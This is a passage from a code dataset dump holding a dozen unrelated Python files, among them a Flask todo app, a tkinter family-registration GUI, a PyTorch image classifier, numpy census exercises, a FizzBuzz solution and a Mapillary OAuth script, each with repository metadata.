current_epoch<=0 :\n return current_epoch\n\n epoch = current_epoch\n #for name in self.model_names:\n for name in [\"G\",\"D\"]:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if not os.path.isfile(load_path):\n print (\"***\",\"fail find%s\"%(load_path))\n continue\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n #for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n # self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n \n return current_epoch\n","sub_path":"sr_seaf/trainer_3.py","file_name":"trainer_3.py","file_ext":"py","file_size_in_byte":18269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"183382335","text":"import io\nfrom os.path import dirname, join\nfrom setuptools import setup\n\n\n# read the contents of your README file\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\ndef get_version(relpath):\n \"\"\"Read version info from a file without importing it\"\"\"\n for line in io.open(join(dirname(__file__), relpath), encoding=\"cp437\"):\n if \"__version__\" in line:\n if '\"' in line:\n # __version__ = \"0.9\"\n return line.split('\"')[1]\n elif \"'\" in line:\n return line.split(\"'\")[1]\n\n\nsetup(\n name='metagenome-atlas',\n version=get_version(\"atlas/__init__.py\"),\n url='https://github.com/metagenome-atlas/atlas',\n license='BSD-3',\n author='Joe Brown, Silas Kieser',\n author_email='brwnjm@gmail.com, silas.kieser@gmail.com',\n description='ATLAS - workflows for assembly, annotation, and genomic binning of metagenomic and metatranscriptomic data.',\n long_description=long_description,\n long_description_content_type='text/markdown',\n packages=['atlas'],\n package_data={'': [\n \"atlas/Snakefile\",\n \"atlas/template_config.yaml\",\n \"atlas/rules/annotate.snakefile\",\n \"atlas/rules/assemble.snakefile\",\n \"atlas/rules/binning.snakefile\",\n \"atlas/rules/download.snakefile\",\n \"atlas/rules/gene_annotation.snakefile\",\n \"atlas/rules/genecatalog.snakefile\",\n \"atlas/rules/get_fasta_of_bins.py\",\n \"atlas/rules/initialize_checkm.py\",\n \"atlas/rules/qc.snakefile\",\n \"atlas/rules/scg_blank_diamond.rb\",\n \"atlas/envs/DASTool.yaml\",\n \"atlas/envs/canopy.yaml\",\n \"atlas/envs/cd-hit.yaml\",\n \"atlas/envs/checkm.yaml\",\n \"atlas/envs/concoct.yaml\",\n \"atlas/envs/dRep.yaml\",\n \"atlas/envs/eggNOG.yaml\",\n \"atlas/envs/maxbin.yaml\",\n \"atlas/envs/metabat.yaml\",\n \"atlas/envs/mmseqs.yaml\",\n \"atlas/envs/optional_genome_binning.yaml\",\n \"atlas/envs/prokka.yaml\",\n \"atlas/envs/report.yaml\",\n \"atlas/envs/required_packages.yaml\",\n \"atlas/envs/sequence_utils.yaml\",\n \"atlas/template_config.yaml\",\n \"atlas/report/qc_report.py\",\n \"atlas/report/report.css\",\n \"atlas/report/assembly_report.py\",\n \"atlas/report/bin_report.py\",\n \"scripts/utils/fasta.py\",\n \"scripts/utils/parsers_bbmap.py\",\n \"scripts/utils/__init__.py\"\n ]},\n include_package_data=True,\n # install via conda: click, pandas, pyyaml, snakemake\n install_requires=[\n 'ruamel.yaml==0.15.35'\n ],\n entry_points={\n 'console_scripts': [\n 'atlas = atlas.atlas:cli'\n ]\n },\n classifiers=[\"Topic :: Scientific/Engineering :: Bio-Informatics\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"185249235","text":"import tkinter as tk\r\nfrom functools import partial\r\nimport family\r\nimport os\r\nfrom center_window import *\r\n\r\n\r\nclass RegisterFamily:\r\n def __init__(self, master):\r\n self.master = master\r\n self.master.geometry('250x215')\r\n center(self.master)\r\n self.frame = tk.Frame(self.master)\r\n self.frame.grid(row=0, column=0)\r\n self.frame.grid_rowconfigure([0, 1, 2], minsize=40)\r\n self.frame.grid_columnconfigure([0, 1, 2], minsize=65)\r\n\r\n self.famName = tk.StringVar()\r\n self.famNum = tk.StringVar()\r\n self.famNameLbl = tk.Label(self.frame, text=\"Family Name: \").grid(row=0, column=0)\r\n self.famNameNtr = tk.Entry(self.frame, textvariable=self.famName).grid(row=0, column=1)\r\n self.numPplLbl = tk.Label(self.frame, text=\"Number of People: \").grid(row=1, column=0)\r\n self.numPplNtr = tk.Entry(self.frame, textvariable=self.famNum).grid(row=1, column=1)\r\n\r\n self.enterNames = tk.Button(self.frame, text=\"Enter Names: \", command=self.__name_frame).grid(row=2, column=1)\r\n\r\n def __name_frame(self):\r\n for i in self.famNum.get():\r\n if not(48 <= ord(i) <= 57):\r\n self.alertLbl = tk.Label(self.frame, text=\"Number of People must be an Integer Value\").grid(row=5, column=0, columnspan=3)\r\n return\r\n if os.path.isfile(f\"{self.famName.get()}\"):\r\n self.alertLbl = tk.Label(self.frame, text=\"Family Already Registered\").grid(row=5, column=0, columnspan=3)\r\n return\r\n try:\r\n int(self.famNum.get())\r\n except ValueError:\r\n return\r\n self.family_file = open(self.famName.get(), \"w+\")\r\n self.family_file.write(self.famName.get() + '\\n')\r\n families_file = open(\"families\", \"a+\")\r\n families_file.write(self.famName.get() + '\\n')\r\n families_file.close()\r\n\r\n self.nameFrame = tk.Frame(self.master)\r\n self.nameFrame.grid(row=1, column=0)\r\n self.nameFrame.grid_rowconfigure([0, 1], minsize=40)\r\n self.nameFrame.grid_columnconfigure([0, 1, 2], minsize=65)\r\n\r\n self.i = 1\r\n\r\n self.personLbl = tk.Label(self.nameFrame, text=f\"Person #{self.i}\").grid(row=0, column=0)\r\n self.personName = tk.StringVar()\r\n self.personNtr = tk.Entry(self.nameFrame, textvariable=self.personName)\r\n self.personNtr.grid(row=0, column=1)\r\n\r\n if int(self.famNum.get()) == 1:\r\n self.ctnuBtn = tk.Button(self.nameFrame, text=\"Continue\", command=self.__continue_reg).grid(row=1, column=1)\r\n else:\r\n self.nxtPersonBtn = tk.Button(self.nameFrame, text=\"Next\", command=self.__next_person).grid(row=1, column=1)\r\n\r\n def __next_person(self):\r\n if self.i == int(self.famNum.get())-1:\r\n self.ctnuBtn = tk.Button(self.nameFrame, text=\"Continue\", command=self.__continue_reg).grid(row=1, column=1)\r\n if self.i < int(self.famNum.get()):\r\n self.family_file.write(self.personName.get() + '\\n')\r\n self.i += 1\r\n self.personLbl = tk.Label(self.nameFrame, text=f\"Person #{self.i}\").grid(row=0, column=0)\r\n self.personNtr.delete(0, 'end')\r\n\r\n def __continue_reg(self):\r\n self.family_file.write(self.personName.get() + '\\n')\r\n self.family_file.close()\r\n\r\n self.newFrame = tk.Frame(self.master)\r\n self.nameFrame.destroy()\r\n self.frame.destroy()\r\n IndividualPerson(self.master, self.newFrame, int(self.famNum.get()), self.famName)\r\n\r\n\r\nclass IndividualPerson:\r\n def __init__(self, master, frame, num, name):\r\n self.frame = frame\r\n self.master = master\r\n self.master.geometry('505x710')\r\n center(self.master)\r\n self.famNum = num\r\n self.famName = name\r\n\r\n self.frame.grid(row=0, column=0)\r\n self.frame.grid_rowconfigure([0, 1, 2, 3, 4, 5], minsize=40)\r\n self.frame.grid_columnconfigure([0, 1, 2, 3, 4], minsize=65)\r\n\r\n with open(self.famName.get(), \"r\") as self.fam_file:\r\n self.fam_data = self.fam_file.readlines()\r\n self.__each_person_info(1)\r\n\r\n def __each_person_info(self, i):\r\n self.i = i\r\n self.personLbl = tk.Label(self.frame, text=f\"{self.fam_data[self.i][:-1]}'s Personal Information\")\r\n self.personLbl.grid(row=0, column=0, sticky=\"we\", columnspan=5)\r\n self.portionLbl = tk.Label(self.frame, text=\"Select Portion Size:\").grid(row=1, column=0)\r\n self.portionViewBtn = tk.Button(self.frame, text=\"View Portion\", command=self.__portion_graph).grid(row=2, column=0)\r\n self.portionSld = tk.Scale(self.frame, tickinterval=25, showvalue=0, orient=tk.HORIZONTAL)\r\n self.portionSld.grid(row=1, column=1, columnspan=4, stick=\"we\")\r\n self.portionsLbl = tk.Label(self.frame, text=\"petite\\t\\tNormal\\t\\tBig Boi\\t\\tULTRA\").grid(row=2, column=1, sticky=\"we\", columnspan=4)\r\n self.portionGraph = tk.Canvas(self.frame, bg=\"darkgoldenrod3\", height=500, width=500)\r\n self.portionGraph.grid(row=3, column=0, columnspan=5, sticky=\"we\")\r\n self.portionPlate = self.portionGraph.create_oval(10, 490, 490, 10, fill=\"lemon chiffon\")\r\n\r\n self.allergyLbl = tk.Label(self.frame, text=\"Allergies: \").grid(row=4, column=0)\r\n self.allergyVar = tk.StringVar()\r\n self.allergyNtr = tk.Entry(self.frame, textvariable=self.allergyVar)\r\n self.allergyNtr.grid(row=4, column=1)\r\n self.allergyLbl2 = tk.Label(self.frame, text=\"(if many separate w/ ',')\").grid(row=4, column=2)\r\n\r\n self.nextBtn = tk.Button(self.frame, text=\"Next\", command=partial(self.__next_person_info, self.i)).grid(row=5, column=4)\r\n if self.famNum == 1:\r\n self.finishBtn = tk.Button(self.frame, text=\"Finish\", command=partial(self.__add_personal, self.i)).grid(row=5, column=4)\r\n\r\n def __portion_graph(self):\r\n self.portionDepiction = self.portionGraph.create_oval(10, 490, 490, 10, fill=\"lemon chiffon\")\r\n if 0 <= self.portionSld.get() < 25:\r\n self.portionDepiction = self.portionGraph.create_oval(200, 300, 300, 200, fill=\"salmon1\")\r\n elif 25 <= self.portionSld.get() < 50:\r\n self.portionDepiction = self.portionGraph.create_oval(150, 350, 350, 150, fill=\"salmon1\")\r\n elif 50 <= self.portionSld.get() < 75:\r\n self.portionDepiction = self.portionGraph.create_oval(100, 400, 400, 100, fill=\"salmon1\")\r\n elif 75 <= self.portionSld.get() < 100:\r\n self.portionDepiction = self.portionGraph.create_oval(50, 450, 450, 50, fill=\"salmon1\")\r\n\r\n def __next_person_info(self, i):\r\n self.i = i\r\n self.__add_personal(self.i)\r\n self.i += 1\r\n if self.i == self.famNum:\r\n self.__each_person_info(self.i)\r\n self.finishBtn = tk.Button(self.frame, text=\"Finish\", command=partial(self.__add_personal, self.i)).grid(row=5, column=4)\r\n else:\r\n self.__each_person_info(self.i)\r\n\r\n def __add_personal(self, i):\r\n if 0 <= self.portionSld.get() < 25:\r\n self.portionSize = 1\r\n elif 25 <= self.portionSld.get() < 50:\r\n self.portionSize = 2\r\n elif 50 <= self.portionSld.get() < 75:\r\n self.portionSize = 3\r\n elif 75 <= self.portionSld.get() < 100:\r\n self.portionSize = 4\r\n\r\n self.fam_data[i] = self.fam_data[i][:-1] + f\"; {self.portionSize}; {self.allergyVar.get()}\" + \"\\n\"\r\n self.family_file = open(self.famName.get(), \"w+\")\r\n\r\n if self.i == self.famNum:\r\n self.family_file.writelines(self.fam_data + ['|\\n'])\r\n self.family_file.close()\r\n self.frame.destroy()\r\n family.ChoseFamily(self.master)\r\n\r\n","sub_path":"reg_family.py","file_name":"reg_family.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"481745980","text":"import os \nfrom glob import glob \nimport numpy as np \nfrom PIL import Image \nimport torch, torchvision \nimport torch.nn as nn \nfrom torchvision import transforms \nfrom torchvision.models import vgg19 \nfrom torch.utils.data import DataLoader \nfrom sklearn.metrics import classification_report\nfrom torch.utils.tensorboard import summary \nimport matplotlib.pyplot as plt\nimport json \nfrom tqdm import tqdm \nimport argparse\n\nfrom networks.vgg import Classifier\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\ntorch.manual_seed(0)\nnp.random.seed(0)\n\nclass Transform():\n def __init__(self, resize, mean, std):\n self.data_transform = {\n \"train\": transforms.Compose([\n transforms.RandomResizedCrop(resize, scale=(.5, 1.0)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ]), \n \"val\": transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n }\n\n def __call__(self, phase, img):\n return self.data_transform[phase](img)\n \n \ndef load_model(labels):\n RESIZE = 224 \n MEAN = (.485, .456, .406)\n STD = (.229, .224, .225)\n net = Classifier(len(labels))\n # gitリポジトリにサイズ関係で置けないので別途用意すること\n net.load_state_dict(torch.load(\"./weights/classifier4.pth\", map_location={\"cuda:0\": \"cpu\"}))\n net.eval()\n net.to(device)\n transform = Transform(RESIZE, MEAN, STD)\n return net, transform \n\ndef load_label():\n with open(\"labels.json\", \"r\") as f:\n label2index = json.load(f)\n f.close()\n index2label = {v: k for k, v in label2index.items()}\n return index2label \n\ndef show_img(img):\n plt.imshow(img.resize((1080, 1080)))\n plt.xticks([])\n plt.yticks([])\n plt.show()\n\ndef main(img_path: str):\n # モデルの読み込み\n index2label = load_label()\n net, transform = load_model(index2label)\n # 画像の前処理\n img = Image.open(img_path)\n show_img(img)\n img_tensor = transform(\"val\", img).unsqueeze(0).to(device)\n # 推論\n with torch.no_grad():\n output = net(img_tensor)\n output = nn.Softmax(dim=1)(output)\n pred = output.topk(3)[0][0].detach().cpu().numpy().tolist() # 確率\n pred_id = output.topk(3)[1][0].detach().cpu().numpy().tolist() # index \n # ラベル名と確率\n results = {}\n for i, (p, idx) in enumerate(zip(pred, pred_id)):\n pred_name = index2label[int(idx)]\n result = {}\n result[\"score\"] = p \n result[\"predict\"] = pred_name \n results[str(i+1)] = result\n return results \n\nparser.add_argument(\"--image\", help=\"image path name\", type=str, default=\"1.jpg\")\nargs = parser.parse_args()\nimage = str(args.image)\nimg_p = os.path.join(\"img\", image)\nmain(img_p)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"626300961","text":"# --------------\n# Importing header files\r\nimport numpy as np\r\n\r\n# Path of the file has been stored in variable called 'path'\r\ndata = np.genfromtxt(path,delimiter=\",\",skip_header = 1)\r\n#New record\r\nnew_record=[[50, 9, 4, 1, 0, 0, 40, 0]]\r\n\r\ncensus = np.concatenate((data,new_record))\r\n\r\n#Code starts here\r\n\n\n\n# --------------\n#Code starts here\r\n# Create a new array called 'age' by taking only age column(age is the column with index 0) of 'census' array.\r\nage = census[:,0]\r\n\r\n# Find the max age and store it in a variable called 'max_age'.\r\nmax_age = np.max(age)\r\n\r\n# Find the min age and store it in a variable called 'min_age'.\r\nmin_age = np.min(age)\r\n\r\n# Find the mean of the age and store it in variable called 'age_mean'.\r\nage_mean = np.mean(age)\r\n\r\n# Find the standard deviation of the age and store it in a variable called 'age_std'.\r\nage_std = np.std(age)\r\n\r\n# print(max_age,min_age,age_mean,age_std)\r\n\n\n\n# --------------\n#Code starts here\r\n\r\n\r\n# race 0\r\n# len(census[:,2])\r\n\r\nrace_0 = census[census[:,2]==0]\r\n\r\n# race 1\r\nrace_1 = census[census[:,2] == 1]\r\n\r\n# race 2\r\nrace_2 = census[census[:,2] == 2]\r\n\r\n# race 3\r\nrace_3 = census[census[:,2] == 3]\r\n\r\n# race 4\r\nrace_4 = census[census[:,2] == 4]\r\n\r\n# storing their lenghts\r\nlen_0 = len(race_0)\r\n\r\nlen_1 = len(race_1)\r\nlen_2 = len(race_2)\r\nlen_3 = len(race_3)\r\nlen_4 = len(race_4)\r\n\r\nminority_race = list(np.array([len_0,len_1,len_2,len_3,len_4])).index(np.min(np.array([len_0,len_1,len_2,len_3,len_4])))\r\n\r\n# print(minority_race)\n\n\n# --------------\n#Code starts here\r\n\r\n\r\n# Create a new subset array called 'senior_citizens' by filtering 'census' according to age>60 (age is the column with index 0)\r\nsenior_citizens = census[ census[:,0] > 60 ]\r\n\r\n# Add all the working hours(working hours is the column with index 6) of 'senior_citizens' and \r\n# store it in a variable called 'working_hours_sum'\r\n\r\nworking_hours_sum = np.sum(senior_citizens[:,6])\r\n\r\n# Find the length of 'senior_citizens' and store it in a variable called 'senior_citizens_len'\r\nsenior_citizens_len = len(senior_citizens)\r\n\r\n# result\r\navg_working_hours = working_hours_sum/senior_citizens_len\r\n\r\nprint(avg_working_hours)\n\n\n# --------------\n#Code starts here\r\n\r\n\r\nhigh,low = census[census[:,1] > 10],census[census[:,1] <= 10]\r\n\r\n# Find the mean of income column(income is the column with index 7) of 'high' array and store it in 'avg_pay_high'. \r\n# Do the same for 'low' array and store it's mean in 'avg_pay_low'.\r\n\r\navg_pay_high,avg_pay_low = np.mean(high[:,7]),np.mean(low[:,7])\r\n\r\nprint(avg_pay_high - avg_pay_low)\n\n\n","sub_path":"numpy_project/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"13925659","text":"import risar\r\nfrom random import randint, uniform\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\n\r\nclass krogec:\r\n def __init__(self):\r\n self.premer = 10\r\n self.x = randint(self.premer, risar.maxX - self.premer)\r\n self.y = randint(self.premer, risar.maxY - self.premer)\r\n self.ky = 1\r\n self.kx = 1\r\n self.px = randint(-5, 5)\r\n self.py = randint(-5, 5)\r\n self.hitrost = uniform(0.000001, 0.000009)\r\n self.barva = risar.nakljucna_barva()\r\n self.lik = risar.krog(self.x, self.y, self.premer, self.barva, 2)\r\n self.pocen = False\r\n self.timer = 500\r\n\r\n def premikanje(self):\r\n if not self.pocen and self.timer > 2:\r\n self.lik.setPos(self.x, self.y)\r\n if self.y + self.premer >= risar.maxY or self.y - self.premer <= 0:\r\n self.ky *= -1\r\n if self.x + self.premer >= risar.maxX or self.x - self.premer <= 0:\r\n self.kx *= -1\r\n self.x += self.px * self.kx\r\n self.y += self.py * self.ky\r\n\r\n def konec(self):\r\n self.risar.stoj()\r\n\r\n def pok(self, x, y):\r\n if not self.pocen:\r\n if abs(self.x - x) < 30 and abs(self.y - y) < 30 or \\\r\n any([True if abs(self.x - i[0]) < 30 and abs(self.y - i[1]) < 30 else False for i in pocene_s]):\r\n risar.odstrani(self.lik)\r\n self.lik = risar.krog(self.x, self.y, 30, self.barva, 2)\r\n c = self.lik.pen().color().lighter()\r\n c.setAlpha(192)\r\n self.lik.setBrush(c)\r\n self.pocen = True\r\n pocene_s.append((self.x, self.y))\r\n if self.pocen:\r\n if self.timer != 0:\r\n self.timer -= 1\r\n else:\r\n if pocene_s:\r\n pocene_s.pop(0)\r\n m.max()\r\n risar.odstrani(self.lik)\r\n risar.odstrani(self.lik)\r\n self.timer = -10\r\n\r\n\r\nclass mis:\r\n def __init__(self):\r\n self.x, self.y = risar.miska\r\n self.da = True\r\n self.merek = risar.krog(self.x, self.y, 30)\r\n self.timer = 3000\r\n self.konec = False\r\n self.maksimalni = 0\r\n\r\n def premik(self):\r\n if self.da:\r\n self.x, self.y = risar.miska\r\n self.merek.setPos(self.x, self.y)\r\n if risar.klik:\r\n risar.odstrani(self.merek)\r\n self.pocen = risar.krog(self.x, self.y, 30)\r\n self.da = False\r\n if risar.klik and not self.da:\r\n if self.timer != 0:\r\n self.timer -= 1\r\n return self.x, self.y\r\n else:\r\n risar.odstrani(self.pocen)\r\n self.konec = True\r\n return -300, -300\r\n else:\r\n return -300, -300\r\n\r\n def koncano(self):\r\n if self.konec and not pocene_s:\r\n self.izpis()\r\n self.konec = False\r\n self.zakljuci()\r\n\r\n def max(self):\r\n self.maksimalni += 1\r\n\r\n def zakljuci(self):\r\n risar.stoj()\r\n\r\n def izpis(self):\r\n if self.konec:\r\n QMessageBox.information(None, \"RAZTRELJENIH\", \"RAZTRELJENO \\n{pocenih}/{vse}\".format(pocenih=self.maksimalni,vse=stevilo))\r\n self.konec=False\r\n\r\nglobal pocene_s\r\npocene_s = []\r\nkrogi = []\r\nstevilo = 5\r\nm = mis()\r\n\r\nfor x in range(stevilo):\r\n k = krogec()\r\n krogi.append(k)\r\n\r\nwhile 1:\r\n for x in range(stevilo):\r\n krogi[x].premikanje()\r\n q, w = m.premik()\r\n krogi[x].pok(q, w)\r\n m.koncano()\r\n risar.cakaj(0.01)\r\n","sub_path":"code/batch-2/vse-naloge-brez-testov/DN14-M-174.py","file_name":"DN14-M-174.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"71675135","text":"\"\"\"\nWrite a program that outputs the string representation of numbers from 1 to n.\n\nBut for multiples of three it should output “Fizz” instead of the number and for the\nmultiples of five output “Buzz”. For numbers which are multiples of both three\nand five output “FizzBuzz”.\n\"\"\"\n\nclass Solution(object):\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n res = [x for x in range(1, n+1)]\n for i, val in enumerate(res):\n if val % 15 == 0:\n res[i] = \"FizzBuzz\"\n elif val % 3 == 0:\n res[i] = \"Fizz\"\n elif val % 5 == 0:\n res[i] = \"Buzz\"\n else:\n res[i] = str(val)\n\n return res\n\n def fizzBuzz2(self, n):\n return ['Fizz' * (not i % 3) + 'Buzz' * (not i % 5) or str(i) for i in range(1, n + 1)]\n\nn = 15\nprint(Solution().fizzBuzz2(n))","sub_path":"412FizzBuzz.py","file_name":"412FizzBuzz.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"261930487","text":"import sqlite3\r\nfrom flask import Flask, request, render_template\r\napp = Flask(__name__)\r\n\r\nconn = sqlite3.connect('database.db')\r\nconn.execute('CREATE TABLE IF NOT EXISTS todo (username TEXT, task TEXT, status INTEGER)')\r\nconn.close()\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef login():\r\n return render_template('login.html')\r\n\r\n@app.route('/register')\r\ndef displayRegister():\r\n\treturn render_template('register.html') \r\n\r\n@app.route('/todo', methods=['GET', 'POST'])\r\ndef toDo():\r\n\tusername = request.form['username']\r\n\treturn render_template('todo.html', username=username) \r\n\r\n@app.route('/add', methods=['POST'])\r\ndef add():\r\n\ttodo = request.form['task']\r\n\treturn render_template('todo.html')\r\n\r\n\r\n@app.route('/addtodo', methods = ['POST', 'GET'])\r\ndef addTODO():\r\n if request.method == 'POST':\r\n try:\r\n username = request.form['username']\r\n task = request.form['task']\r\n \r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n cur.execute(\"INSERT INTO todo (name, task, status) VALUES (?,?,?)\", (name, task, status))\r\n con.commit()\r\n\r\n except:\r\n con.rollback() \r\n\r\n finally:\r\n return render_template(\"result.html\")\r\n con.close()\r\n\r\n@app.route('/list')\r\ndef list():\r\n con = sql.connect(\"database.db\")\r\n con.row_factory = sql.Row\r\n \r\n cur = con.cursor()\r\n cur.execute(\"select * from todo\")\r\n \r\n rows = cur.fetchall(); \r\n return render_template(\"list.html\",rows = rows)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host='0.0.0.0')","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316258121","text":"from datetime import datetime\nfrom pylons import g\nfrom sqlalchemy import func\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.schema import Column\nfrom sqlalchemy.sql import and_\nfrom sqlalchemy.types import DateTime, Integer, String\n\nfrom r2.models.gold import Base, Session\n\n\ndef with_sqlalchemy_session(f):\n \"\"\"Ensures sqlalchemy session is closed (due to connection pooling).\"\"\"\n def close_session_after(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n finally:\n Session.remove()\n\n return close_session_after\n\n\nclass GoldPartnerCodesExhaustedError(Exception):\n pass\n\n\nclass GoldPartnerDealCode(Base):\n \"\"\"Promo codes for deals from reddit gold partners.\"\"\"\n\n __tablename__ = \"reddit_gold_partner_deal_codes\"\n\n id = Column(Integer, primary_key=True)\n deal = Column(String, nullable=False)\n code = Column(String, nullable=False)\n user = Column(Integer, nullable=True)\n date = Column(DateTime(timezone=True), nullable=True)\n\n @classmethod\n @with_sqlalchemy_session\n def get_codes_for_user(cls, user):\n results = Session.query(cls).filter(cls.user == user._id)\n codes = {r.deal: r.code for r in results}\n return codes\n \n @classmethod\n @with_sqlalchemy_session\n def claim_code(cls, user, deal):\n # check if they already have a code for this deal and return it\n try:\n result = (Session.query(cls)\n .filter(and_(cls.user == user._id,\n cls.deal == deal))\n .one())\n return result.code\n except NoResultFound:\n pass\n\n # select an unclaimed code, assign it to the user, and return it\n try:\n claiming = (Session.query(cls)\n .filter(and_(cls.deal == deal,\n cls.user == None,\n func.pg_try_advisory_lock(cls.id)))\n .limit(1)\n .one())\n except NoResultFound:\n raise GoldPartnerCodesExhaustedError\n\n claiming.user = user._id\n claiming.date = datetime.now(g.tz)\n Session.add(claiming)\n Session.commit()\n\n # release the lock\n Session.query(func.pg_advisory_unlock_all()).all()\n\n return claiming.code \n","sub_path":"reddit_gold/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"56951208","text":"from oauthlib.oauth2 import MobileApplicationClient\nfrom requests_oauthlib import OAuth2Session\n\n\nclient_id = 'd0FVV29VMDR6SUVrcV94cTdabHBoZzoxZjc2MTE1Mzc1YjMxNzhi'\ntoken_url = \"https://a.mapillary.com/v2/oauth/token\"\nredirect_uri = \"https://geoclub.de/mapillary/oauth2.php\"\nauth_url = \"https://www.mapillary.com/connect\"\nscopes = ['public:upload']\n\nmobile = MobileApplicationClient(client_id)\noauth = OAuth2Session(client=mobile, redirect_uri=redirect_uri, scope=scopes)\nauthorization_url, state = oauth.authorization_url(url=auth_url)\nprint(\"State:\", state)\n\nprint( 'Please go to %s and authorize access.' % authorization_url)\nauthorization_response = input('\\nEnter the resulting callback URL:\\n')\n\nf = open(\"accesstoken3.conf\", \"w\")\nfor line in authorization_response.split(\"&\"):\n if \"access_token\" in line:\n f.write(line.split(\"=\")[1])\nf.close()\nprint(\"Configfile with access token created.\")\n","sub_path":"python3/accesstoken3.py","file_name":"accesstoken3.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"146148297","text":"import random\n\nSIZE = 20\nMIN = 1\nMAX = 9\n\nint_list = [0] * SIZE\n\nfor i in range(SIZE):\n int_list[i] = random.randint(MIN,MAX)\n\nvalid = None\nwhile not valid:\n number = int(input(\"Please enter your lucky number (from \" + str(MIN) + \" to \" + str(MAX) + \": \"))\n if number <= MAX and number >= MIN:\n valid = True\n\noccurrences = []\n\nfor i in range(SIZE):\n if int_list[i] == number:\n occurrences.append(i)\n\nif len(occurrences) == 0:\n print(\"Sorry, you are not on the list.\")\nelse:\n print(\"We found your number on position\" + (\"s \" if len(occurrences) > 1 else \" \") + str(occurrences))\n","sub_path":"week 6/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"645129707","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 10 10:40:20 2021\r\n\r\n@author: illari and jonas\r\n\r\nThis script takes a set of Gaussian output files containing NBO data and extracts\r\ncalculated NBO occupancies and energies between labeled atoms in each Gaussian\r\nfile defined in 'Atomlabels'. The input files must be in the same working\r\ndirectory as this script.\r\n\r\nThe results are tabulated and recorded in an output Excel workbook ('NBO analysis.xlsx')\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport itertools as i\r\nimport glob\r\nimport re\r\n\r\n#READ ATOMLABELS AND LIST OF .LOG FILES\r\nstring1 = 'Please put all .log files in the same directory as this script' #creates a list of all .log files in current directory\r\nprint(string1) \r\nlistFileNames = [] \r\nfor filename in glob.glob(\"*.log\"):\r\n listFileNames.append(filename)\r\n\r\nstring2 = 'Please enter the name of the Atomlabels file without .xlsx:' #reads atomlabels excel sheet but has to be in same folder\r\npathAtomLables = input(string2) \r\ndfAtomLabels = pd.read_excel(str(pathAtomLables)+'.xlsx',index_col=0)\r\n \r\n#Generates the column names for the the output dataframe\r\nallvalenceorbitals = [] \r\nfor element in list(dfAtomLabels.head()): #adds LP(1) through LP(3) to the list list of atomnames given in Atomlabels.\r\n allvalenceorbitals.append(element + ' LP(1)')\r\n allvalenceorbitals.append(element + ' LP(2)')\r\n allvalenceorbitals.append(element + ' LP(3)')\r\nbondcombinationswithoutdash = list(i.combinations(list(dfAtomLabels.head()), 2)) #returns all possible 2-atom combinations and casts it to a list of str\r\nbondcombination = [' - '.join(i) for i in bondcombinationswithoutdash] \r\nfor element in bondcombination: \r\n allvalenceorbitals.append(element + ' BD(1)') #gnerated bonding and antibonding orbitals for all bonds.\r\n allvalenceorbitals.append(element + ' BD(2)')\r\n allvalenceorbitals.append(element + ' BD(3)')\r\n allvalenceorbitals.append(element + ' BD*(1)')\r\n allvalenceorbitals.append(element + ' BD*(2)')\r\n allvalenceorbitals.append(element + ' BD*(3)')\r\nallNBOtitle = []\r\nfor element in allvalenceorbitals:\r\n allNBOtitle.append(element + ' occ')\r\n allNBOtitle.append(element + ' Energy')\r\n\r\n#GET DATA OF .LOG FILES\r\ndef get_logfiles(files):\r\n 